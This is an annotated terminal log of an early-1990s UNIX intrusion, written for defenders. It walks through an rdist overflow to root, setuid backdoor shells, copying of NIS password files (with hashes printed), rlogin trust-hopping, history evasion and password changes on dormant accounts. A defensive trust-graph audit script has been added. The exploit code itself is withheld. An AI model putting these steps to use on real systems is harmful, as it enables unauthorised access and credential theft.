What the Hacker Was Doing…

Line #1
When this hacker broke into the system in December, he used a guest account set up without a password. After he broke in, he assigned his own password to the guest account and to the account called "ingres," so he would have easy login access next time around.

Line #2
The "who" command checks to see whether anyone else is logged on. Our friend doesn't want anyone on the system to notice him.

Line #5
This line copies a communications program called "kermit" to the hacker's current working directory. Then he can use kermit to transfer the security tools that he will use to gain access to systems and data. Note that most hackers transfer their own security tools to simplify their work. Some hackers know little to nothing about operating systems; they just employ tools written by people who do.

Lines #6 to 25
Now the hacker is exploiting a known bug to gain root access to the system. (The hacker writes some code to overflow a buffer in rdist and then sends commands to rdist that get executed.) If the system had been properly patched, this wouldn't be possible!

1 valley% sh
2 $ who
3 ingres ttyp0 Jan 18 23:02
4 root ttyp2 Jan 15 18:38 (canyon)
5 $ cp /home2/jeff/bin/kermit.orig kermit
6 $ kermit
7 C-Kermit 5A(178) ALPHA, 29 Jan 92, SUNOS 4.1 (BSD)
8 Type ? or HELP for help
9 C-Kermit>rece fi
10 Escape back to your local Kermit and give a SEND command...
11 # N3
12 0 Yz* @-#Y1~N! y-
13 %!YfiO
14 #"Y@
15 ##YA
16 #$YB
17 #%YC
18 #&YD
19 C-Kermit>
20 Stopped
21 valley% sh
22 Stopped (signal)
23 valley% sh
24 overflows buffer here (removed for security)
25 $ /tmp/sh

Lines #26 to 27
The hacker now has root access. He's in! He sets the mode and permissions and changes the name to something he's not likely to forget. Notice that he removes the /tmp/sh file, since he doesn't want to leave any evidence of his visit.

Line #28
He misspells a command.
Lines #29 to 45
He issues the ls (list) command with -t (time) specified to obtain a directory listing with the newest files listed first. The files are listed.

Lines #46 to 48
Just checking again to make sure he doesn't have company. Most hackers continue to check the system for other logins for the duration of their attacks.

Line #49
Here he's using the grep command to find the string "est". (The -i option tells UNIX that either upper- or lowercase characters are OK.) Presumably, the hacker's looking for logins from the DNS domain of ".West". (If you're not familiar with UNIX, "grep" is a common command that stands for Grab Regular ExPression. Basically, you can use grep to search a system for any occurrences of a specified string within files on that system.)

26 # rm /tmp/sh
27 rm: override protection 755 for /tmp/sh? y
28 # lsll
29 # ls -tal
30 total 1049
31 drwxr-xr-x 4 ingres 512 Jan 18 23:04 .
32 -rwsrwsrwx 1 root 24576 Jan 18 23:04 suck
33 -rw-r--r-- 1 root 61 Jan 18 23:04 c.c
34 -rwxr-xr-x 1 ingres 442368 Jan 18 23:03 kermit
35 -rwxrwxrwx 1 ingres 360448 Jan 16 11:02 testit
36 drwxr-xr-x 30 root 1024 Dec 18 20:27 ..
37 -rw-r--r-- 1 ingres 1148 Jun 9 1992 foo
38 drwxrwsrwx 6 ingres 6144 Aug 23 1991 SERVICE
39 -rwxr-xr-x 1 ingres 106496 Feb 25 1991 sun4_lookup
40 -rwxr-xr-x 1 ingres 98304 Feb 25 1991 sun3_lookup
41 drwxr-xr-x 3 ingres 512 Jan 23 1991 quoter
42 -rw-r--r-- 1 ingres 306 Nov 20 1987 .cshrc
43 -rw-r--r-- 1 ingres 1159 Nov 20 1987 .install
44 -r--r--r-- 1 ingres 20 Nov 20 1987 .version
45 -rw-r--r-- 1 ingres 36 Jan 26 1987 .oemstring
46 # who
47 ingres ttyp0 Jan 18 23:02
48 root ttyp2 Jan 15 18:38 (canyon)
49 # last | grep -i est

Lines #50 to 57
Now he's looking for someone specific, "lorin." Apparently, "lorin" hasn't logged in since the last time the hacker broke in and deleted the log files (on January 16). He tries to grep for "lorin" in /etc/passwd, but mistypes the command.
Then, he remembers that the user name he's thinking of is "lorimo" not "lorin." Obviously, this guy's been here before.

Lines #58 to 61
The intruder re-edits a C program to change his user ID to 21477. The new setting allows him to switch user to "lorimo."

Lines #62 to 66
More typos. This guy could use a good typing tutor.

Lines #67 to 75
Here the hacker compiles a new version of his exploit code, sending the results (a.out) to another name he will not forget (he's got a great vocabulary). By executing two of his exploit scripts, he changes his user ID.

50 # last lorin
51 wtmp begins Sat Jan 16 11:37
52 # grep lor /etc/passwwd
53 grep: /etc/passwwd: No such file or directory
54 # grep lor /etc/passwd
55 # ypcat passwd | grep lor
56 lori:N.4Pgz4iUS8kk:5734:50:Lori:/home/lori:/bin/csh
57 lorimo:xxYTF8y3fSqGo:21477:50:Lori:/home/lorimo:/bin/csh
58 # ed c.c
59 /uid/
60 setuid(0);
61 setuid(21477);
62 # cc .cc
63 cc: Warning: File with unknown suffix (.cc) passed to ld
64 ld: .cc: No such file or directory
65 # cc `c
66 > ^C
67 # cc c.c
68 # mv a.out shit
69 # chmod 6777 shit
70 # ./suck
71 # id
72 uid=0(root) gid=0(wheel) groups=7
73 # ./shit
74 $ id
75 uid=21477(lorimo) gid=0(wheel) groups=7

Lines #76 to 88
Now he's looking for new places to go by issuing rlogin commands to other systems on which lorimo might be trusted (.rhosts files and /etc/hosts.equiv are used to set up trust between systems). If lorimo is trusted on other systems, the hacker will be granted access to those systems without having to enter a password. This is called "door rattling." If he is successful, it will give him access to more information and new places to launch attacks from in the future.

Line #89
The hacker changes his identity back to the superuser (root).

Lines #90 to 92
He looks over his shoulder again (hence the "who" command), then double-checks that he's got the user ID information correct.

Lines #93 to 94
The hacker looks for lorimo in the NIS password map.
Line #95
The hacker changes to the directory /home.

76 $ rlogin tsunami
77 Password:
78 Login incorrect
79 Login incorrect
80 login: ^D
81 Connection closed.
82 $ rlogjn suntzu
83 rlogjn: not found
84 $ rlogin suntzu
85 Password:
86 Login incorrect
87 login: ^D
88 Connection closed.
89 $ ^D
90 # who
91 ingres ttyp0 Jan 18 23:02
92 root ttyp2 Jan 15 18:38 (canyon)
93 # ypcat passwd | grep lorimo
94 lorimo:xxYTF8y3fSqGo:21477:50:Lori :/home/lorimo:/bin/csh
95 # cd /home

Line #96
The hacker starts a background job to search for .rhosts entries in /home. The logic behind this search is that some people using the .rhosts file (for trust) may have multiple .rhosts entries around the network. While this job is running, he moves on.

Lines #97 to 98
More hacker typos.

Lines #99 to 100
Our friend has had enough of being lorimo. He checks the password file for jeff. He decides to impersonate jeff. First, however, he must edit his code.

Lines #101 to 113
He tries to edit his code, but he is in the wrong directory. He switches to the right directory, edits the code, executes the code, and becomes the user jeff.

Lines #114 to 119
Becoming jeff was a good choice. The hacker logs into a new system (tsunami) without even needing a password. (This is an excellent example of how having one system trust another can be very dangerous.)

96 # find . -name .rhosts -print &
97 # gupr
98 # grep^C
99 # ypcat passwd | grep jeff
100 jeff:wW/q0t03L6xO.:13147:50:Jeff :/home/jeff:/bin/csh
101 # ed c.c
102 ?c.c: No such file or directory
103 # cd
104 # ed c.c
105 /uid/
106 setuid(21477);
107 setuid(13147);
108 # cc c.c
109 # mv a.out shit
110 # chmod 6777 shit
111 # ./shit
112 $ id
113 uid=13147(jeff) gid=0(wheel) groups=7
114 $ rlogj tsunami
115 rlogj: not found
116 $ rlogin tsunami
117 No directory! Logging in with home=/
118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT 1992
119 You have new mail.
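Door rattling pays off because trust chains: jeff on valley gets into tsunami with no password, and later jeff on tsunami gets into suntzu the same way. The following added Python example (not part of the original write-up) models hosts.equiv and .rhosts entries as a graph and computes every host a given login can reach without a password, plus any "+" wildcard entries; the file contents are constructed to mirror the hops in the transcript, since the real files were never shown.

```python
"""Trust-graph audit for password-less rlogin (.rhosts and hosts.equiv).

Added example, not part of the original write-up. The file contents below are
constructed to mirror the hops in the transcript (jeff on valley gets into
tsunami, then from tsunami into suntzu, with no password asked); the real
files were never shown, so the entries are illustrative only.
"""
from collections import deque

# Constructed sample: (host, path) -> file text. Each line is "host [user]";
# "+" is the wildcard that matches any host or any user.
TRUST_FILES = {
    ("tsunami", "/etc/hosts.equiv"): "valley\n",
    ("tsunami", "/home/jeff/.rhosts"): "valley jeff\n",
    ("suntzu", "/home/jeff/.rhosts"): "# added long ago, never removed\ntsunami jeff\n+ +\n",
    ("valley", "/etc/hosts.equiv"): "",
}


def parse_trust_file(text):
    """Yield (host, user) per entry; user is None for a bare host line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            parts = line.split()
            yield parts[0], (parts[1] if len(parts) > 1 else None)


def trusted_sources(dst_host, user, trust_files):
    """Hosts from which `user` can rlogin to dst_host without a password.

    hosts.equiv never applies to root; a .rhosts file only counts when it
    sits in the home directory of the very user who is logging in.
    """
    sources = set()
    for (host, path), text in trust_files.items():
        if host != dst_host:
            continue
        is_equiv = path.endswith("hosts.equiv")
        if is_equiv and user == "root":
            continue
        if not is_equiv and path.split("/")[-2] != user:
            continue
        for ent_host, ent_user in parse_trust_file(text):
            if ent_user in (None, "+", user):
                sources.add(ent_host)
    return sources


def reachable_hosts(start_host, user, trust_files):
    """Transitive closure of the trust graph: every host `user` can reach from
    start_host by chaining password-less rlogins (the intruder's door
    rattling, worked out on paper by the defender)."""
    hosts = {h for h, _ in trust_files}
    seen, queue = {start_host}, deque([start_host])
    while queue:
        cur = queue.popleft()
        for dst in hosts - seen:
            srcs = trusted_sources(dst, user, trust_files)
            if cur in srcs or "+" in srcs:
                seen.add(dst)
                queue.append(dst)
    return seen - {start_host}


def wildcard_entries(trust_files):
    """Entries with a '+' host or user: they trust the whole network."""
    return sorted((host, path, eh, eu or "") for (host, path), text in trust_files.items()
                  for eh, eu in parse_trust_file(text) if "+" in (eh, eu))


if __name__ == "__main__":
    print("jeff from valley reaches:", sorted(reachable_hosts("valley", "jeff", TRUST_FILES)))
    for finding in wildcard_entries(TRUST_FILES):
        print("wildcard trust:", finding)
```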
Lines #120 to 126
The hacker (who is now the user jeff) sets his shell to sh to foil any csh .history logs. (The hacker is being careful not to leave evidence of his commands behind.) Then he checks to see who else is logged onto the system.

Lines #127 to 136
The hacker tries to copy the password file and gets permission denied because he does not have permission to copy into that directory. He checks to see who he is logged in as (he must have forgotten). He sees he is logged in as Jeff. Since Jeff does not have permission to copy files to that directory, the hacker changes to the /tmp directory, to which any user may write.

Lines #137 to 141
He's stretching his wings a bit here, looking for password maps to copy and explore. (He copies the NIS password file to a file called "aaa".) Hackers often copy password files in order to subject them to password crackers and obtain more passwords. The more passwords a hacker has, the better his odds of raiding other systems.

120 tsunami% ^C
121 tsunami% sh
122 $ who
123 wendy ttyp2 Jan 6 13:55 (arawana)
124 derek ttyp3 Jan 13 17:57 (lajolla)
125 derek ttyp4 Jan 15 13:11 (lajolla)
126 jeff ttyp5 Jan 18 23:09 (valley)
127 $ cat /etc/passwd^C
128 $ ypcaty^C
129 $ ypcat passwd > suna
130 suna: Permission denied
131 $ id
132 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)
133 $ pwd
134 $ cd
135 $ pwd
136 $ cd /tmp
137 $ ypcat passwd > aaa
138 $ ls -tal aa
139 aa not found
140 $ ls -tal aaa
141 -rw-r--r-- 1 jeff 15382 Jan 18 23:09 aaa

Lines #142 to 162
Now he starts an ftp session back to the original host (valley) as user ingres. In that session, he copies the password file to the system valley. In the same session, he copies his security tools from valley to tsunami.

Lines #163 to 173
Once again, he re-creates his small C program (again omitted for security reasons) to exploit a security bug to obtain superuser access (root). He now has full control (root access) of system tsunami.
142 $ ftp valley
143 Connected to valley
144 220 valley FTP server (SunOS 4.1) ready.
145 Name (valley:jeff): ingres
146 331 Password required for ingres.
147 Password:
148 230 User ingres logged in.
149 ftp> send aaa
150 200 PORT command successful.
151 150 ASCII data connection for aaa
152 226 ASCII Transfer complete.
153 local: aaa remote: aaa
154 15578 bytes sent in 0.063 seconds (2.4e+02 Kbytes/s)
155 ftp> get foo
156 200 PORT command successful.
157 150 ASCII data connection for foo
158 226 ASCII Transfer complete.
159 local: foo remote: foo
160 1155 bytes received in 0.11 seconds (9.9 Kbytes/s)
161 ftp> quit
162 221 Goodbye.
163 $ cat foo | /usr/ucb/rdist -Server localhost
164 $ /tmp/sh
165 # rm foo
166 # rm /tmp/sh
167 rm: override protection 755 for /tmp/sh? y
168 # ed c.c
169 # cc c.c
170 # chmod 6777 a.out
171 # ./a.out
172 # id
173 uid=0(root) gid=0(wheel) groups=50(lastaff)

Lines #174 to 182
The hacker looks to see if there are any password.old entries or other changes to the /etc/passwd file. The hacker also tries to change jeff's NIS password without success.

Lines #183 to 197
This time, he lists the contents of the /etc/passwd file.

174 # ls -tal /etc/*ass*
175 -rw-r--r-- 1 root 634 Dec 7 12:31 /etc/passwd
176 # cat /etc/}4^U
177 passwd
178 cat: /etc/}4: No such file or directory
179 Changing NIS password for jeff on suntzu.
180 Old password:
181 New password:
182 Password unchanged.
183 # cat /etc/passwd
184 root:R7QCfnYR4gvzU:0:1:Operator:/:/bin/csh
185 nobody:*:65534:65534::/:
186 daemon:*:1:1::/:
187 sys:*:2:2::/:/bin/csh
188 bin:*:3:3::/bin:
189 uucp:*:4:8::/var/spool/uucppublic:
190 news:*:6:6::/var/spool/news:/bin/csh
191 ingres:*:7:7::/usr/ingres:/bin/csh
192 audit:*:9:9::/etc/security/audit:/bin/csh
193 sync::1:1::/:/bin/sync
194 sysdiag:*:0:1:Old System Diag:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
    sundiag:*:0:1:System Diag:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
195 operator:lNtDk7crIdKh2:5:5:Account for backups:/usr/backup:/bin/csh
196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh
197 +::0:0:::

Lines #198 to 209
The hacker changes his user ID from superuser back to jeff. Then, he rechecks his user ID and proceeds to rename his a.out to a name he won't forget (just like before). Again, he runs an ls -t command to list the newest files first.

Lines #210 to 212
He removes his local copy of the NIS password file ("aaa"). He's already copied the file back to host valley, so he doesn't need it here. Then, he removes his exploit code and is ready to move on.

Lines #213 to 227
The hacker checks to see which filesystems are mounted.

198 # ^D
199 # id
200 uid=4401(jeff) gid=50(lastaff) euid=0(root) groups=50(lastaff)
201 # mc^C
202 # mv .^C
203 # mv a.out shit
204 # ls -tal
205 total 2415
206 drwxrwsrwx 3 bin 1024 Jan 18 23:12 .
207 -rwsrwsrwx 1 root 24576 Jan 18 23:11 shit
208 -rw-r--r-- 1 root 61 Jan 18 23:11 c.c
209 -rw-r--r-- 1 jeff 15382 Jan 18 23:09 aaa
210 # rm aaa
211 # rm c.c
212 rm: override protection 644 for c.c? y
213 # df
214 Filesystem kbytes used avail capacity Mounted on
215 /dev/sd0a 10483 5081 4354 54% /
216 /dev/sd0g 96943 78335 8914 90% /usr
217 /dev/sd0e 22927 3111 17524 15% /var
218 /dev/sd1h 1255494 1081249 48696 96% /home
219 /dev/sd3h 1255494 1030386 99559 91% /home/se
220 la:/usr/local 2097151 1154033 692365 63% /usr/local
221 suntzu:/var/spool/mail
222 445852 334295 66972 83% /var/spool/mail
223 mfp:/home/sybase 318991 244337 42755 85% /home/sybase
224 app1:/export/sun/sun4/openwin-3.0
225 189858 131073 39799 77% /usr/openwin
226 app1:/export/apps 1255494 771887 358057 68% /export/apps
227 app1:/export/apps 1255494 771887 358057 68% /usr/local

Lines #228 to 229
More typos or possible line noise.

Lines #230 to 258
The hacker looks for user home directories, finds wendy's home directory, and becomes user wendy. That's short-lived, because for some reason the hacker decides to look for the user dan. Presumably, the hacker already knows that dan exists.

228 # irG~cd /home/se
229 irG~cd: not found
230 # cd /home/se
231 # ls
232 cmeyer hamant lost+found mikec wendy
233 colleen joseph mark mikep
234 derek kevin matthews neally
235 # cd wendy
236 # cp /tmp/shit .
237 # ls -tal shit
238 -rwxr-xr-x 1 root 24576 Jan 18 23:13 shit
239 # chmod 6777 shit
240 # ls -tal shit
241 -rwsrwsrwx 1 root 24576 Jan 18 23:13 shit
242 # pwd
243 /home/se/wendy
244 # cd /tmp
245 # ls -tal | more
246 total 2398
247 drwxrwsrwx 3 bin 1024 Jan 18 23:13 .
248 -rwsrwsrwx 1 root 24576 Jan 18 23:11 shit
249 -rwxr-xr-x 1 cmeyer 41 Jan 13 12:31 junk
250 -rw-r--r-- 1 cmeyer 12 Jan 13 12:05 junk.dat
251 -rw-r--r-- 1 derek 0 Jan 12 16:07 6310
252 (16 lines of output were deleted; the hacker becomes the user wendy)
253 hacker typos
254 # rm shit
255 # grep dan/etc/passwd
256 # ypcat passwd | grep dan
257 danf:*:13602:50::/home/guest/danf:/bin/csh
258 dan:*H.6HaoIt2xDu2:13601:50:& :/home/guest/dan:/bin/csh

Lines #259 to 263
More nervous glances (with "who").

Lines #264 to 273
He goes back to being jeff.
Apparently, the real jeff gets around quite a bit, since the hacker now logs onto suntzu as jeff. Again, no password is required.

Line #274
Another shell change to avoid leaving his mark in the history logs.

Lines #275 to 281
The hacker checks to make sure that /home/se is mounted from host tsunami. (If you remember, /home/se/wendy is where he left his exploit code. He'll need that to gain root access to this new host.)

259 # who
260 wendy ttyp2 Jan 6 13:55 (arawana)
261 derek ttyp3 Jan 13 17:57 (lajolla)
262 derek ttyp4 Jan 15 13:11 (lajolla)
263 jeff ttyp5 Jan 18 23:09 (valley)
264 # ^D
265 $ id
266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)
267 $ rlogin suntzu
268 Last login: Thu Jan 14 06:35:30 on ttyh1
269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT 1992
270 You have new mail.
271 suntzu% who
272 jeff ttyp0 Jan 18 23:14
273 (tsunami)
274 suntzu% sh
275 $ df
276 Filesystem kbytes used avail capacity Mounted on
277 /dev/sd6a 14983 11056 2429 82% /
278 /dev/sd6g 91998 76365 6434 92% /usr
279 /dev/sd6h 445852 334297 66970 83% /var
280 /dev/sd4c 1255494 1030410 99535 91% /home/se
281 tsunami:/home/se 1255494 1030410 99535 91% /tmp_mnt/home/se

Lines #282 to 287
The hacker uses his exploit code and gains root access on the system suntzu. This makes three systems he's compromised so far.

Lines #288 to 292
He is looking for passwords again. (Is this starting to seem familiar?)

Lines #293 to 317
The hacker changes to the guest home directory and lists the contents. He notices a file in a home directory called dan/test.

Line #318
I've removed several lines to protect confidentiality.
282 $ cd /home/se/wendy
283 $ ls -tal shit
284 -rwsrwsrwx 1 root 24576 Jan 18 23:13 shit
285 $ ./shit
286 # id
287 uid=0(root) gid=0(wheel) groups=50(lastaff)
288 # ls -tal /etc/*ass*
289 -rw-r--r-- 1 root 15465 Jan 15 14:29 /etc/passwd
290 -rw-r--r-- 1 root 15462 Dec 28 17:58 /etc/passwd.OLD
291 -rw-r--r-- 1 root 15514 Nov 12 18:58 /etc/passwd.old
292 -rw-r--r-- 1 root 15215 Sep 9 10:02 /etc/passwd~
293 # cd /home/guests
294 /home/guests: bad directory
295 # cd /home/guest
296 # ls -tal
297 total 56
298 dr-xr-xr-x 10 root 512 Jan 18 23:15 ..
299 drwxr-xr-x 9 guest1 1024 Jan 15 16:21 guest1
300 drwxr-xr-x 11 mary 1536 Jan 14 17:37 mary
301 drwxr-xr-x 5 jeffs 512 Jan 12 15:57 jeffs
302 drwxr-xr-x 3 eddie 512 Jan 8 13:04 eddie
303 drwxr-xr-x 3 sunwise 512 Jan 8 09:36 sunwise
304 drwxrwxrwx 3 brad 512 Jan 6 15:43 dan
305 # ls -tsl dan
306 total 1450
307 1 -rw-r--r-- 1 65534 34 Jan 6 15:43 test
308 264 -rw-r--r-- 1 dan 255563 Jul 8 1992 packet.dat
309 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sz
310 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sx
311 56 -rwxr-xr-x 3 dan 57344 Jul 1 1992 sb
312 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rx
313 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rb
314 40 -rwxr-xr-x 3 dan 40960 Jul 1 1992 rz
315 896 -rw-rw-rw- 1 dan 901682 Jun 16 1992 junk.2
316 1 drwxr-xr-x 2 dan 512 Oct 25 1990 doswin
317 # cat dan/test
318 code removed for security reasons

Line #319
Now the hacker's looking for the person with UID 65534. This turns out to be the user ID for "nobody."

Lines #320 to 393
Here, he's looking for other users on this system. He's particularly interested in user accounts that haven't been used recently, since no one is likely to notice him using such accounts. To find inactive accounts, the hacker looks for directories with no recent file accesses. He also checks the last times that users were logged into the system.

319 # grep 65534 /etc/passwd
320 # cd /home/se
321 # ls -tal
322 total 44
323 dr-xr-xr-x 10 root 512 Jan 18 23:15 ..
324 drwxr-xr-x 17 wendy 2560 Jan 18 23:13 wendy
325 drwxr-xr-x 26 hamant 4608 Jan 18 17:28 hamant
326 drwxr-xr-x 48 neally 9728 Jan 18 11:03 neally
327 drwxr-xr-x 41 derek 3584 Jan 16 03:16 derek
328 drwxr-xr-x 17 kevin 2048 Jan 15 17:04 kevin
329 drwxr-xr-x 31 mark 3072 Jan 15 16:41 mark
330 drwxr-xr-x 19 colleen 1536 Jan 15 16:15 colleen
331 drwxr-xr-x 44 matthews 4608 Jan 15 11:37 matthews
332 drwxr-xr-x 16 mikep 1536 Jan 15 11:24 mikep
333 drwxr-xr-x 2 10406 512 Dec 2 11:35 mikec
334 drwxr-xr-x 24 cmeyer 2048 Dec 1 11:11 cmeyer
335 drwxr-xr-x 15 root 512 Sep 15 17:04 .
336 drwxr-xr-x 8 5542 1536 Aug 28 15:13 joseph
337 drwxr-xr-x 2 root 512 Jul 17 1991 lost+found
338 # last | grep eric
339 ericz ttyh1 Mon Jan 18 08:30 - 08:32 (00:02)
340 ericz ttyh1 Aug 30 14:25 - 14:25 (00:00)
341 ericz ttyh1 ^C
342 # id
343 uid=0(root) gid=0(wheel) groups=50(lastaff)
344 # grep eric /etc/passwd
345 Uace:LEkQ/KdKGcyV2:4:4:ACE:/usr/spool/uucppublic:/usr/lib/uucp/uucico
346 Uaim:93uUCUdUU6zdI:4:4:AIM:/usr/spool/uucppublic:/usr/lib/uucp/uucico
347 ericz:vt0R/k7x2W1kY:3063:50::/home/region3/ericz:/bin/csh
348 ericc:23JjW1a5hqUSQ:4094:10:& :/home/guest/eric:/bin/csh
349 # last ericc
350 ericc ttyp1 ptero Mon Aug 3 18:52 - 18:52 (00:00)
351 wtmp begins Wed Jul 1 18:46
352 # last richp
353 richp ttyp0 awe Sat Jan 16 19:33 - 19:34 (00:00)
354 richp ttyp4 vela Mon Jan 11 15:59 - 16:00 (00:00)
355 richp ttyp8 vela Wed Oct 7 13:28 - 13:58 (00:29)
356 richp ttyh1 Mon Oct 5 15:39 - 15:41 (00:01)
357 richp ttyh1 Mon Oct 5 14:15 - 14:18 (00:02)
358 richp ttyh1 Mon Oct 5 13:54 - 13:58 (00:03)
359 richp ttyp3 vela Mon Oct 5 09:43 - 09:44 (00:00)
360 richp ttyh1 Wed Sep 30 17:57 - 17:57 (00:00)
361 richp ttyp2 vela Tue Sep 29 14:31 - 14:32 (00:00)
362 richp ttyh1 Thu Sep 24 13:48 - 13:51 (00:02)
363 richp ttyp1 valley Wed Sep 23 19:47 - 19:48 (00:00)
364 richp ttyh1 Wed Sep 23 13:28 - 13:48 (00:20)
365 richp ttyh1 Mon Sep 21 11:27 - 11:29 (00:02)
366 richp ttyp6 vela Fri Sep 4 09:15 - 09:16 (00:01)
367 richp ttyp5 vela Thu Sep 3 12:31 - 13:00 (00:28)
368 richp ttyp5 vela Thu Sep 3 12:11 - 12:11 (00:00)
369 richp ttyp5 vela Thu Sep 3 11:42 - 11:43 (00:00)
370 richp ttyp5 vela Thu Sep 3 10:01 - 10:04 (00:02)
371 wtmp begins Wed Jul 1 18:46
372 # last lwake
373 lwake ttyp2 runcible Tue Dec 1 15:00 - 15:06 (00:06)
374 lwake ttyp3 runcible Wed Sep 30 13:01 - 13:15 (00:13)
375 lwake ttyp2 runcible Tue Sep 22 09:12 - 09:14 (00:02)
376 lwake ttyp2 runcible Fri Jul 24 14:40 - 14:40 (00:00)
377 lwake ttyp4 runcible Fri Jul 17 09:13 - 09:14 (00:00)
378 lwake ttyp4 runcible Fri Jul 17 09:12 - 09:13 (00:00)
379 lwake ttyp2 runcible Mon Jul 13 16:56 - 17:02 (00:05)
380 wtmp begins Wed Jul 1 18:46
381 # last eggers
382 eggers ttyp0 sunkist Thu Jan 7 06:40 - 06:40 (00:00)
383 eggers ttyh1 Mon Nov 16 16:41 - 16:42 (00:00)
384 eggers ttyp1 bike Mon Nov 16 16:37 - 16:41 (00:03)
385 eggers ttyp1 bike Thu Nov 12 18:35 - 18:39 (00:03)
386 eggers ftp bike Wed Oct 7 12:58 - 13:03 (00:05)
387 eggers ttyp8 bike Wed Oct 7 12:53 - 13:03 (00:10)
388 eggers ttyp1 bike Tue Oct 6 14:14 - 15:27 (01:13)
389 eggers ttyp1 bike Wed Sep 23 16:25 - 16:30 (00:05)
390 eggers ttyp1 bike Tue Sep 15 20:34 - 20:36 (00:01)
391 eggers ttyh1 Fri Sep 11 18:39 - 18:39 (00:00)
392 eggers ttyh1 Fri Sep 11 18:11 - 18:21 (00:10)
393 eggers ttyh1 Fri Sep 11 17:52 - 18:01 (00:08)

Lines #394 to 426
At this point, our friend is getting ready to leave. But first, he sets new passwords to the dormant accounts he's been using. This step will make his next break-in here much easier. (This is why you always need to set new passwords after a break-in!)

Lines #427 to 431
Enough for one day. Our unwanted guest covers his tracks (not shown for security reasons) and logs out.

394 # passwd ericc
395 Changing password for ericc on suntzu.
396 New password:
397 Retype new password:
398 # grep lori /etc/passwd
399 lori:FAJEq1YKw4p7.,0:5734:50:Lori:/home/guest/lori:/bin/csh
400 # pwd
401 /tmp_mnt/home/se/wendy
402 # cd /home/guests
403 /home/guests: bad directory
404 # cd /home/guest
405 # ls -tal lori
406 total 10
407 drwxr-xr-x 52 root 1024 Sep 12 14:25 ..
408 drwxr-xr-x 3 lori 512 Aug 9 18:46 .
409 -rw-r--r-- 1 lori 1262 Aug 9 18:46 .l123set,v1.1
410 drwxr-xr-x 2 lori 512 Aug 8 17:45 .dist
411 -rw-r--r-- 1 lori 1457 Jun 7 1991 .login
412 -rw-r--r-- 1 lori 2687 Jun 7 1991 .cshrc
413 # last lori
414 wtmp begins Wed Jul 1 18:46
415 # passwd ericc
416 Changing password for ericc on suntzu
417 New password:
418 Retype new password:
419 # passwd lori
420 Changing password for lori on suntzu
421 New password:
422 Retype new password:
423 # passwd jeff
424 Changing password for jeff on suntzu
425 New password:
426 Retype new password:
427 # ^D
428 $ ^D
429 valley% ^D
430 There are stopped jobs
431 valley% logout